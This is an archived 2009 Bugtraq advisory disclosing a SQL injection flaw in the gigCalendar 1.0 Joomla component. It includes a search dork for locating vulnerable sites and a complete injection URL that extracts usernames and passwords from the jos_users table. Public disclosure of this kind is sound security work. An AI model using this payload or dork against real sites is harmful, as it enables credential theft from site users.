lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 21 Feb 2009 19:09:30 +0100
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@...il.com>
To: Bugtraq <bugtraq@...urityfocus.com>, submit@...w0rm.com
Subject: gigCalendar 1.0 (venuedetails.php) Joomla Component SQL Injection

*******   Salvatore "drosophila" Fresta   *******


Application:	gigCalendar Joomla Component 1.0
			http://joomlacode.org/gf/project/gigcalendar/
Version:		gigCalendar 1.0
Bug:         	* SQL Injection
Exploitation:	Remote
Dork:		inurl:"index.php?option=com_gigcal"
Date:         	21 Feb 2009
Discovered by:Salvatore "drosophila" Fresta
Author:       	Salvatore "drosophila" Fresta
		        e-mail: drosophilaxxx@...il.com
              	

*************************************************

- BUGS

SQL Injection:

	Requisites: magic_quotes_gpc = off

	File affected: venuedetails.php

	This bug allows a guest to view username and
	password of a registered user.

	http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_venues_id=-1'
UNION ALL SELECT 1,concat('username: ',
username),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat('password:
', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23

*************************************************

-- 
Salvatore "drosophila" Fresta
CWNP444351

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ